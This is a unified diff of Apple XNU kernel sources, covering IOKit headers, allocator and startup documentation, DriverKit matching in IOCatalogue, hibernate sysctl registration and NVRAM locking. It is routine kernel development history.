 '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
index 55a844ea8082bc092303b3da05a8649fb4414753..bc9deb57c8eec5288220eef67ee1493abc19841e 100644 (file)
@@ -56,7 +56,7 @@ For all `kalloc` or `kheap_alloc` variants, these advices apply:
 
 - If your allocation size is of fixed size, of a sub-page size, and done with
   the `Z_WAITOK` semantics (allocation can block), consider adding `Z_NOFAIL`,
-- If you `bzero` the memory on allocation, prefer passing `Z_ZERO` which can be
+- If you `bzero` the memory on allocation, instead pass `Z_ZERO` which can be
   optimized away more often than not.
 
 ### Considerations for zones
@@ -83,7 +83,7 @@ Security wise, the following questions need answering:
 
 There are several allocation wrappers in XNU, present for various reasons
 ranging from additional accounting features (IOKit's `IONew`), conformance to
-langauge requirements (C++ various `new` operators) or organical historical
+language requirements (C++ various `new` operators) or organic historical
 reasons.
 
 `zalloc` and `kalloc` are considered the primitive allocation interfaces which
index 15e587dfe57540c60073b3c41764e703d244d712..92e528f8c88fc3b398a468d2a22edabef92df08a 100644 (file)
@@ -189,6 +189,8 @@ Initializes the percpu subsystem.
 Rank 1: allocates the percpu memory, `percpu_foreach_base` and `percpu_foreach`
         become usable.
 
+Rank 2: sets up static percpu counters.
+
 
 `STARTUP_SUB_LOCKS`
 -------------------
@@ -205,7 +207,6 @@ tracing features). Available hooks are:
 
 - Rank 1: `LCK_MTX_DECLARE`.
 
-
 `STARTUP_SUB_CODESIGNING`
 -------------------------
 
@@ -243,6 +244,21 @@ Initializes the Mach IPC subsystem.
 - Rank last: Final IPC initialization.
 
 
+`STARTUP_SUB_SYSCTL`
+-------------------------
+
+### Description
+
+Initializes the sysctl kernel subsystem
+
+### Rank usage
+
+- Rank 1: automatic `SYSCTL_NODE` registration.
+- Rank 2: automatic `SYSCTL_OID` registration.
+- Middle: other manual early registrations.
+- Last: registrations of dummy nodes in the constant nodes to allow extension.
+
+
 `STARTUP_SUB_EARLY_BOOT`
 ------------------------
 
@@ -271,5 +287,3 @@ When the kernel locks down:
 ### Rank usage
 
 N/A.
-
-
index 478a721f9f3924bd569abc0e675dfbe97d1ec100..9c23a9be2a747560a7adb7f12e15c5de2625fd47 100644 (file)
@@ -106,6 +106,15 @@ public:
        virtual kern_return_t
        Stop(IOService * provider) LOCAL;
 
+       /*! @function   ClientCrashed
+        * @discussion  Notification for kernel objects of a client crash.
+     * @param       client Attached client.
+     * @param       options No options are currently defined.
+        * @return      kIOReturnSuccess on success. See IOReturn.h for error codes.
+        */
+       virtual kern_return_t
+       ClientCrashed(IOService * client, uint64_t options);
+
     /*!
      * @brief       Obtain IOKit IORegistryEntryID.
      * @param       registryEntryID IORegistryEntryID for the IOKit object.
index 10c76c8528d36baa3b05b5b10809e9b5de9f4d14..3c9633969c860aa7763e10408886f1a54d28d503 100644 (file)
@@ -88,8 +88,9 @@ enum {
  * @field       scalarOutput Array of scalars to return to the caller.
  * @field       scalarOutputCount Count of scalars to return to the caller in scalarOutput.
  * @field       structureOutput An OSData to be returned to the caller as structure output.
- *                             A reference will be consumed by the caller. It is an error to set this field if
- *              structureOutputDescriptor was passed in
+ *              This field should be set by the driver to an OSData object it created with
+ *              the data to be returned, and the OSData instance will be released by the OS.
+ *              It is an error for the driver to set this field if structureOutputDescriptor was passed in
  * @field       structureOutputDescriptor A IOMemoryDescriptor specified by the caller for structure output.
  * @field       structureOutputMaximumSize Maximum size of structure output specified by caller
  *              or kIOUserClientVariableStructureSize.
index 992e3a9fe85e48b029ef8c851118b9827a0308c1..dbc6aaaf55838c2bc27f48986dcca46e77860eb4 100644 (file)
 // care.
 #define kIONVRAMForceSyncNowPropertyKey         "IONVRAM-FORCESYNCNOW-PROPERTY"
 
+// GUID to address variables for the system NVRAM region
+#define kIOKitSystemGUID                        "40A0DDD2-77F8-4392-B4A3-1E7304206516"
+#define kIOKitSystemGUIDPrefix                  (kIOKitSystemGUID ":")
+// Internal only key to give access to system region on internal builds
+#define kIONVRAMSystemInternalAllowKey          "com.apple.private.iokit.system-nvram-internal-allow"
+
 
 // clientHasPrivilege security token for kIOClientPrivilegeSecureConsoleProcess
 typedef struct _IOUCProcessToken {
@@ -90,12 +96,12 @@ typedef struct _IOUCProcessToken {
 #define kIOPlatformFunctionHandlerSet                "IOPlatformFunctionHandlerSet"
 
 #define kIOPlatformFunctionHandlerMaxBusDelay        "IOPlatformFunctionHandlerMaxBusDelay"
-#define kIOPlatformMaxBusDelay        "IOPlatformMaxBusDelay"
+#define kIOPlatformMaxBusDelay                       "IOPlatformMaxBusDelay"
 
 #if defined(__i386__) || defined(__x86_64__)
 
 #define kIOPlatformFunctionHandlerMaxInterruptDelay  "IOPlatformFunctionHandlerMaxInterruptDelay"
-#define kIOPlatformMaxInterruptDelay  "IOPlatformMaxInterruptDelay"
+#define kIOPlatformMaxInterruptDelay                 "IOPlatformMaxInterruptDelay"
 
 #endif /* defined(__i386__) || defined(__x86_64__) */
 
index 55973bad621682535e844b0332eeb9370662f537..3cb427cfc0f36941d0b18feee38dc7196cbb180b 100644 (file)
@@ -169,6 +169,7 @@ extern io_object_t iokit_lookup_uext_ref_current_task(mach_port_name_t name);
 
 extern void iokit_retain_port( ipc_port_t port );
 extern void iokit_release_port( ipc_port_t port );
+extern void iokit_make_port_send( ipc_port_t port );
 extern void iokit_release_port_send( ipc_port_t port );
 
 extern void iokit_lock_port(ipc_port_t port);
index dc944236e46199819d4739e5f6dca8daa60aebcb..3ddc39fdfcf4de57868670ece48c54e3436262ae 100644 (file)
@@ -840,6 +840,7 @@ class IOMemoryMap : public OSObject
        OSDeclareDefaultStructorsWithDispatch(IOMemoryMap);
 #ifdef XNU_KERNEL_PRIVATE
 public:
+       IOOptionBits         fOptions;
        OSPtr<IOMemoryDescriptor>  fMemory;
        OSPtr<IOMemoryMap>         fSuperMap;
        mach_vm_size_t       fOffset;
@@ -847,10 +848,7 @@ public:
        mach_vm_size_t       fLength;
        task_t               fAddressTask;
        vm_map_t             fAddressMap;
-       IOOptionBits         fOptions;
        upl_t                fRedirUPL;
-       ipc_port_t           fRedirEntry;
-       IOMemoryDescriptor * fOwner;
        uint8_t              fUserClientUnmap;
 #if IOTRACKING
        IOTrackingUser       fTracking;
index 17f91c66ab9ccb8a146da9f76f42654c41d8e7d3..d556b9fab6c2f5eb91779eb6530495ccbbeb3c54 100644 (file)
@@ -79,10 +79,12 @@ class IODTNVRAM : public IOService
        OSDeclareDefaultStructors(IODTNVRAM);
 
 private:
+       friend class IODTNVRAMVariables;
+
        IONVRAMController      *_nvramController;
        OSPtr<const OSSymbol>  _registryPropertiesKey;
        UInt8                  *_nvramImage;
-       IOLock                 *_variableLock;
+       IORWLock               *_variableLock;
        IOLock                 *_controllerLock;
        UInt32                 _commonPartitionOffset;
        UInt32                 _commonPartitionSize;
@@ -151,7 +153,11 @@ private:
        IOReturn removePropertyInternal(const OSSymbol *aKey);
        IOReturn chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid,
            const char *variableName, OSDictionary **dict) const;
-       bool handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error);
+       IOReturn flushDict(const uuid_t *guid, IONVRAMOperation op);
+       bool handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error);
+       OSSharedPtr<OSObject> copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const;
+       IOReturn removePropertyWithGUIDAndName(const uuid_t *guid, const char *name);
+       IOReturn setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject);
 
 public:
        virtual bool init(IORegistryEntry *old, const IORegistryPlane *plane) APPLE_KEXT_OVERRIDE;
index 66c3a0341fa5130e499414bab3fc8b77b1269d33..2a5457662609225e28c5650a67ddc701db92afb1 100644 (file)
@@ -32,6 +32,7 @@ extern "C" {
 #include <machine/machine_routines.h>
 };
 
+#include <stdint.h>
 #include <IOKit/IOService.h>
 
 /*!
@@ -43,15 +44,25 @@ class IOPMGR : public IOService
        OSDeclareAbstractStructors(IOPMGR);
 
 public:
+       /*!
+        * @function        enableCPUCore
+        * @abstract        Enable a single CPU core.
+        * @discussion      Release a secondary CPU core from reset, and enable
+        *                  external IRQ delivery to the core.  XNU will not
+        *                  invoke this method on the boot CPU's cpu_id.
+        * @param cpu_id    Logical CPU ID of the core.
+        * @param entry_pa  Physical address to use as the reset vector on the
+        *                  secondary CPU.  Not all platforms will honor this
+        *                  parameter; on Apple Silicon RVBAR_EL1 is programmed
+        *                  by iBoot.
+        */
+       virtual void enableCPUCore(unsigned int cpu_id, uint64_t entry_pa);
+
        /*!
         * @function      enableCPUCore
-        * @abstract      Enable a single CPU core.
-        * @discussion    Release a secondary CPU core from reset, and enable
-        *                external IRQ delivery to the core.  XNU will not
-        *                invoke this method on the boot CPU's cpu_id.
-        * @param cpu_id  Logical CPU ID of the core.
+        * @abstract      Deprecated - Enable a single CPU core.
         */
-       virtual void enableCPUCore(unsigned int cpu_id) = 0;
+       virtual void enableCPUCore(unsigned int cpu_id);
 
        /*!
         * @function      disableCPUCore
index 6e3e852a352f470fdbdb1928769b66d19f721a60..8954d781cd60cd60abd507cddd9b38110a5b68ac 100644 (file)
@@ -79,7 +79,8 @@ enum {
        kPEPagingOff,
        kPEPanicBegin,
        kPEPanicEnd,
-       kPEPanicRestartCPUNoCallouts
+       kPEPanicRestartCPUNoCallouts,
+       kPEPanicDiagnosticsDone,
 };
 
 /* Bitmask of details related to panic callouts */
@@ -95,6 +96,7 @@ extern int PEHaltRestartInternal(unsigned int type, uint32_t details);
 enum {
        kIOSystemShutdownNotificationStageProcessExit = 0,
        kIOSystemShutdownNotificationStageRootUnmount = 1,
+       kIOSystemShutdownNotificationTerminateDEXTs   = 2,
 };
 extern void IOSystemShutdownNotification(int stage);
 
index ba3c5063f8d8e1d1483371442398e50ba5cfcc27..47756e784b1683f2d649b048d374675f5b51915f 100644 (file)
@@ -239,6 +239,12 @@ public:
 
        static void initialize();
 
+       inline static bool
+       isEnabled()
+       {
+               return enabled;
+       }
+
        static void onKextLoad(OSKext *kext, kmod_info_t *kmod_info);
        static void onKextUnload(OSKext *kext);
        static void onClassAdded(OSKext *parentKext, OSMetaClass *metaClass);
index a750d3fec3b7b28e99826018f2ddd1c695e5c670..a9c8d122f1c2afc5d5734c4734dcc846dc76878d 100644 (file)
@@ -142,6 +142,7 @@ void serverAdd(IOUserServer * server);
 void serverRemove(IOUserServer * server);
 void serverAck(IOUserServer * server);
 bool serverSlept(void);
+void systemHalt(void);
 };
 
 /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
@@ -204,6 +205,7 @@ public:
        void                   setDriverKitUUID(OSKext *kext);
        void                   setCheckInToken(IOUserServerCheckInToken *token);
        void                   systemPower(bool powerOff);
+       void                               systemHalt(void);
        IOReturn                                setPowerState(unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE;
        IOReturn                                powerStateWillChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE;
        IOReturn                                powerStateDidChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE;
index 1f2b651ad7c0c2572253010cc19a416e7841abd3..bbcbe802fb397d9416a582ceaf67ba73eb806421 100644 (file)
@@ -672,6 +672,7 @@ enum {
        kIOPSFamilyCodeExternal4     = iokit_family_err(sub_iokit_pmu, 4),
        kIOPSFamilyCodeExternal5     = iokit_family_err(sub_iokit_pmu, 5),
        kIOPSFamilyCodeExternal6     = iokit_family_err(sub_iokit_pmu, 6),
+       kIOPSFamilyCodeExternal7     = iokit_family_err(sub_iokit_pmu, 7),
 };
 
 // values for kIOPMPSAdapterDetailsErrorFlagsKey
index 4c1eb9eecf4a136655e68afce3ea626fc1180053..690bb80416d0ae3bc5ecd4dcee04775bdc01d5f6 100644 (file)
@@ -112,9 +112,6 @@ enum {
 #define kIOPMMessageRequestUserActive \
                 iokit_family_msg(sub_iokit_powermanagement, 0x460)
 
-#define kIOPMMessageRequestSystemShutdown \
-                iokit_family_msg(sub_iokit_powermanagement, 0x470)
-
 /* @enum SystemSleepReasons
  * @abstract The potential causes for system sleep as logged in the system event record.
  */
index 7b670bf53e2c6ba5b30f02131b871aff31df4060..de3e2cdd408a04191c750f78cba218b9efe4082d 100644 (file)
@@ -83,10 +83,9 @@ IOBMDPageProc(iopa_t * a)
 {
        kern_return_t kr;
        vm_address_t  vmaddr  = 0;
-       int           options = 0;// KMA_LOMEM;
 
        kr = kernel_memory_allocate(kernel_map, &vmaddr,
-           page_size, 0, options, VM_KERN_MEMORY_IOKIT);
+           page_size, 0, KMA_NONE, VM_KERN_MEMORY_IOKIT);
 
        if (KERN_SUCCESS != kr) {
                vmaddr = 0;
index 958022743b026089271787cf5359243d662bb5c6..a57b083a7213be51dda569145d995fb69856bce8 100644 (file)
@@ -73,6 +73,7 @@ OSSharedPtr<const OSSymbol> gIOClassKey;
 OSSharedPtr<const OSSymbol> gIOProbeScoreKey;
 OSSharedPtr<const OSSymbol> gIOModuleIdentifierKey;
 OSSharedPtr<const OSSymbol> gIOModuleIdentifierKernelKey;
+OSSharedPtr<const OSSymbol> gIOHIDInterfaceClassName;
 IORWLock       * gIOCatalogLock;
 
 #if PRAGMA_MARK
@@ -113,6 +114,7 @@ IOCatalogue::initialize(void)
        gIOProbeScoreKey             = OSSymbol::withCStringNoCopy( kIOProbeScoreKey );
        gIOModuleIdentifierKey       = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKey );
        gIOModuleIdentifierKernelKey = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKernelKey );
+       gIOHIDInterfaceClassName     = OSSymbol::withCStringNoCopy( "IOHIDInterface" );
 
 
        assert( array && gIOClassKey && gIOProbeScoreKey
@@ -808,7 +810,9 @@ IOCatalogue::terminateDriversForModule(
 {
        IOReturn ret;
        OSSharedPtr<OSDictionary> dict;
+       OSSharedPtr<OSKext> kext;
        bool isLoaded = false;
+       bool isDext = false;
 
        /* Check first if the kext currently has any linkage dependents;
         * in such a case the unload would fail so let's not terminate any
@@ -829,6 +833,11 @@ IOCatalogue::terminateDriversForModule(
                        goto finish;
                }
        }
+       kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy());
+       if (kext) {
+               isDext = kext->isDriverKit();
+       }
+
        dict = OSDictionary::withCapacity(1);
        if (!dict) {
                ret = kIOReturnNoMemory;
@@ -839,20 +848,25 @@ IOCatalogue::terminateDriversForModule(
 
        ret = terminateDrivers(dict.get(), NULL);
 
-       /* No goto between IOLock calls!
-        */
-       IORWLockWrite(lock);
-       if (kIOReturnSuccess == ret) {
-               ret = _removeDrivers(dict.get());
-       }
+       if (isDext) {
+               /* Force rematching after removing personalities. Dexts are never considered to be "loaded" (from OSKext),
+                * so we can't call unloadModule() to remove personalities and start rematching. */
+               removeDrivers(dict.get(), true);
+       } else {
+               /* No goto between IOLock calls!
+                */
+               IORWLockWrite(lock);
+               if (kIOReturnSuccess == ret) {
+                       ret = _removeDrivers(dict.get());
+               }
 
-       // Unload the module itself.
-       if (unload && isLoaded && ret == kIOReturnSuccess) {
-               ret = unloadModule(moduleName);
+               // Unload the module itself.
+               if (unload && isLoaded && ret == kIOReturnSuccess) {
+                       ret = unloadModule(moduleName);
+               }
+               IORWLockUnlock(lock);
        }
 
-       IORWLockUnlock(lock);
-
 finish:
        return ret;
 }
@@ -926,6 +940,8 @@ bool
 IOCatalogue::startMatching( const OSSymbol * moduleName )
 {
        OSSharedPtr<OSOrderedSet> set;
+       OSSharedPtr<OSKext>       kext;
+       OSSharedPtr<OSArray>      servicesToTerminate;
 
        if (!moduleName) {
                return false;
@@ -939,6 +955,53 @@ IOCatalogue::startMatching( const OSSymbol * moduleName )
 
        IORWLockRead(lock);
 
+       kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy());
+       if (kext && kext->isDriverKit()) {
+               /* We're here because kernelmanagerd called IOCatalogueModuleLoaded after launching a dext.
+                * Determine what providers the dext would match against. If there's something already attached
+                * to the provider, terminate it.
+                *
+                * This is only safe to do for HID dexts.
+                */
+               OSSharedPtr<OSArray> dextPersonalities = kext->copyPersonalitiesArray();
+
+               if (!dextPersonalities) {
+                       return false;
+               }
+
+               servicesToTerminate = OSArray::withCapacity(1);
+               if (!servicesToTerminate) {
+                       return false;
+               }
+
+               dextPersonalities->iterateObjects(^bool (OSObject * obj) {
+                       OSDictionary * personality = OSDynamicCast(OSDictionary, obj);
+                       OSSharedPtr<OSIterator> iter;
+                       IOService * provider;
+                       OSSharedPtr<IOService> service;
+                       const OSSymbol * category;
+
+                       if (personality) {
+                               category = OSDynamicCast(OSSymbol, personality->getObject(gIOMatchCategoryKey));
+                               if (!category) {
+                                       category = gIODefaultMatchCategoryKey;
+                               }
+                               iter = IOService::getMatchingServices(personality);
+
+                               while (iter && (provider = OSDynamicCast(IOService, iter->getNextObject()))) {
+                                       if (provider->metaCast(gIOHIDInterfaceClassName.get()) != NULL) {
+                                               service.reset(provider->copyClientWithCategory(category), OSNoRetain);
+                                               if (service) {
+                                                       servicesToTerminate->setObject(service);
+                                               }
+                                       }
+                               }
+                       }
+
+                       return false;
+               });
+       }
+
        personalities->iterateObjects(^bool (const OSSymbol * key, OSObject * value) {
                OSArray      * array;
                OSDictionary * dict;
@@ -958,6 +1021,22 @@ IOCatalogue::startMatching( const OSSymbol * moduleName )
                return false;
        });
 
+       if (servicesToTerminate) {
+               servicesToTerminate->iterateObjects(^bool (OSObject * obj) {
+                       IOService * service = OSDynamicCast(IOService, obj);
+                       if (service) {
+                               IOOptionBits terminateOptions = kIOServiceRequired;
+                               if (service->hasUserServer()) {
+                                       terminateOptions |= kIOServiceTerminateNeedWillTerminate;
+                               }
+                               if (!service->terminate(terminateOptions)) {
+                                       IOLog("%s: failed to terminate service %s-0x%qx with options %08llx for new dext %s\n", __FUNCTION__, service->getName(), service->getRegistryEntryID(), (long long)terminateOptions, moduleName->getCStringNoCopy());
+                               }
+                       }
+                       return false;
+               });
+       }
+
        // Start device matching.
        if (set->getCount() > 0) {
                IOService::catalogNewDrivers(set.get());
index 484656a0d2ee3ffebb9efc20046e2d74ba7c9257..5da53410f42b00ffb1cc7976bcf92561d12bf5b4 100644 (file)
@@ -664,7 +664,7 @@ IODMACommand::walkAll(uint32_t op)
                                }
 
                                kr = vm_page_alloc_list(state->fCopyPageCount,
-                                   KMA_LOMEM | KMA_NOPAGEWAIT, &mapBase);
+                                   (kma_flags_t)(KMA_LOMEM | KMA_NOPAGEWAIT), &mapBase);
                                if (KERN_SUCCESS != kr) {
                                        DEBG("vm_page_alloc_list(%d) failed (%d)\n", state->fCopyPageCount, kr);
                                        mapBase = NULL;
index 2fc024f6e1fa20b9a78b35e2fca5799c1943d7ee..3303016d05a404c9336861e8e49e04d742a1a8ae 100644 (file)
@@ -1462,36 +1462,37 @@ IOHibernateWasScreenLocked(void)
 /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
 
 SYSCTL_STRING(_kern, OID_AUTO, hibernatefile,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     gIOHibernateFilename, sizeof(gIOHibernateFilename), "");
 SYSCTL_STRING(_kern, OID_AUTO, bootsignature,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     gIOHibernateBootSignature, sizeof(gIOHibernateBootSignature), "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatemode,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOHibernateMode, 0, "");
 SYSCTL_STRUCT(_kern, OID_AUTO, hibernatestatistics,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &_hibernateStats, hibernate_statistics_t, "");
-SYSCTL_STRING(_kern_bridge, OID_AUTO, bootsessionuuid,
-    CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
-    gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString), "");
+SYSCTL_OID_MANUAL(_kern_bridge, OID_AUTO, bootsessionuuid,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString),
+    sysctl_handle_string, "A", "");
 
 SYSCTL_UINT(_kern, OID_AUTO, hibernategraphicsready,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.graphicsReadyTime, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatewakenotification,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.wakeNotificationTime, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatelockscreenready,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.lockScreenReadyTime, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatehidready,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.hidReadyTime, 0, "");
 
 SYSCTL_UINT(_kern, OID_AUTO, hibernatecount,
-    CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &gIOHibernateCount, 0, "");
 
 /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
@@ -1561,16 +1562,6 @@ IOHibernateSystemInit(IOPMrootDomain * rootDomain)
                gIOHibernateFilename[0] = 0;
        }
 
-       sysctl_register_oid(&sysctl__kern_hibernatefile);
-       sysctl_register_oid(&sysctl__kern_bootsignature);
-       sysctl_register_oid(&sysctl__kern_hibernatemode);
-       sysctl_register_oid(&sysctl__kern_hibernatestatistics);
-       sysctl_register_oid(&sysctl__kern_hibernategraphicsready);
-       sysctl_register_oid(&sysctl__kern_hibernatewakenotification);
-       sysctl_register_oid(&sysctl__kern_hibernatelockscreenready);
-       sysctl_register_oid(&sysctl__kern_hibernatehidready);
-       sysctl_register_oid(&sysctl__kern_hibernatecount);
-
        gIOChosenEntry = IORegistryEntry::fromPath("/chosen", gIODTPlane);
 
        if (gIOChosenEntry
index 0a4213b386a86f8a29fc7af075f610cff05deff6..b61d58a142e3de27e006e59fd5a932ffd0671d37 100644 (file)
@@ -77,7 +77,7 @@ sysctl_debug_iokit
 }
 
 SYSCTL_PROC(_debug, OID_AUTO, iokit,
-    CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOKitDebug, 0, sysctl_debug_iokit, "Q", "boot_arg io");
 
 size_t          debug_malloc_size;
index 1cbb0485d8811e642ccfdff4ac1a0d8782d28d0c..a829c88d418e1e79435ee44b44f3fc66273b4134 100644 (file)
@@ -198,6 +198,9 @@ extern bool gCPUsRunning;
 
 extern OSSet * gIORemoveOnReadProperties;
 
+extern uint32_t gHaltTimeMaxLog;
+extern uint32_t gHaltTimeMaxPanic;
+
 extern "C" void IOKitInitializeTime( void );
 extern void IOMachPortInitialize(void);
 
@@ -214,8 +217,6 @@ extern "C" void IOKitKernelLogBuffer(const char * title, const void * buffer, si
 extern const OSSymbol * gIOCreateEFIDevicePathSymbol;
 extern "C" void IOSetKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor * data);
 extern "C" void IOSetAPFSKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor* data);
-extern "C" void IOSetARVRootHashData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData);
-extern "C" void IOSetARVManifestData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData);
 #endif
 extern const  OSSymbol * gAKSGetKey;
 
index 6d3312369f072816838748aa8bb8bbd682a150f6..8246f6261cfb46b911629d25b4476a8faa60e09d 100644 (file)
@@ -451,7 +451,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size,
                address = 0; /* overflow detected */
        } else if (adjustedSize >= page_size) {
                kr = kernel_memory_allocate(kernel_map, &address,
-                   size, alignMask, 0, IOMemoryTag(kernel_map));
+                   size, alignMask, KMA_NONE, IOMemoryTag(kernel_map));
                if (KERN_SUCCESS != kr) {
                        address = 0;
                }
@@ -465,7 +465,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size,
 
                if (adjustedSize >= page_size) {
                        kr = kernel_memory_allocate(kernel_map, &allocationAddress,
-                           adjustedSize, 0, 0, IOMemoryTag(kernel_map));
+                           adjustedSize, 0, KMA_NONE, IOMemoryTag(kernel_map));
                        if (KERN_SUCCESS != kr) {
                                allocationAddress = 0;
                        }
@@ -628,7 +628,7 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP
            || (alignment > page_size);
 
        if (contiguous || maxPhys) {
-               int options = 0;
+               kma_flags_t options = KMA_NONE;
                vm_offset_t virt;
 
                adjustedSize = size;
@@ -643,14 +643,15 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP
 #endif
                        if (maxPhys <= 0xFFFFFFFF) {
                                maxPhys = 0;
-                               options |= KMA_LOMEM;
+                               options = (kma_flags_t)(options | KMA_LOMEM);
                        } else if (gIOLastPage && (atop_64(maxPhys) > gIOLastPage)) {
                                maxPhys = 0;
                        }
                }
                if (contiguous || maxPhys) {
                        kr = kmem_alloc_contig(kernel_map, &virt, size,
-                           alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask), 0, IOMemoryTag(kernel_map));
+                           alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask),
+                           KMA_NONE, IOMemoryTag(kernel_map));
                } else {
                        kr = kernel_memory_allocate(kernel_map, &virt,
                            size, alignMask, options, IOMemoryTag(kernel_map));
index e4accd2085b30641d23b08b734269b2e52ba20bd..348cc897548338c9f4a9a71014bd4bffc1ba0ede 100644 (file)
@@ -5307,12 +5307,6 @@ IOMemoryMap::free()
                fMemory.reset();
        }
 
-       if (fOwner && (fOwner != fMemory)) {
-               LOCK;
-               fOwner->removeMapping(this);
-               UNLOCK;
-       }
-
        if (fSuperMap) {
                fSuperMap.reset();
        }
index 69725d4036657eaf7c4a6ca8da913764f24fd422..06d2efcdbad7a48add563e25a5b956581d7fada8 100644 (file)
@@ -40,6 +40,7 @@
 #include <kern/debug.h>
 #include <pexpert/boot.h>
 #include <pexpert/pexpert.h>
+#include <sys/csr.h>
 
 #define super IOService
 
 // From Apple CHRP Spec
 #define NVRAM_CHRP_SIG_SYSTEM    0x70
 #define NVRAM_CHRP_SIG_CONFIG    0x71
-#define NVRAM_CHRP_SIG_FREESPACE 0x7F
 
-#define NVRAM_CHRP_PARTITION_NAME_COMMON        "common"
-#define NVRAM_CHRP_PARTITION_NAME_SYSTEM        "system"
-#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY "secure"
-#define NVRAM_CHRP_PARTITION_NAME_FREESPACE     "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77"
+#define NVRAM_CHRP_PARTITION_NAME_COMMON_V1   "common"
+#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1   "system"
+#define NVRAM_CHRP_PARTITION_NAME_COMMON_V2   "2common"
+#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2   "2system"
 
 #define NVRAM_CHRP_LENGTH_BLOCK_SIZE 0x10 // CHRP length field is in 16 byte blocks
 
@@ -112,26 +112,43 @@ OSDefineMetaClassAndStructors(IODTNVRAM, IOService);
                IOLockUnlock(_controllerLock);       \
 })
 
-#define NVRAMLOCK()                              \
-({                                               \
+#define NVRAMREADLOCK()                             \
+({                                                  \
        if (preemption_enabled() && !panic_active()) \
-               IOLockLock(_variableLock);           \
+               IORWLockRead(_variableLock);         \
 })
 
-#define NVRAMUNLOCK()                            \
-({                                               \
+#define NVRAMWRITELOCK()                            \
+({                                                  \
        if (preemption_enabled() && !panic_active()) \
-               IOLockUnlock(_variableLock);         \
+               IORWLockWrite(_variableLock);        \
 })
 
-#define NVRAMLOCKASSERT()                                    \
-({                                                           \
-       if (preemption_enabled() && !panic_active())             \
-               IOLockAssert(_variableLock, kIOLockAssertOwned); \
+#define NVRAMUNLOCK()                               \
+({                                                  \
+       if (preemption_enabled() && !panic_active()) \
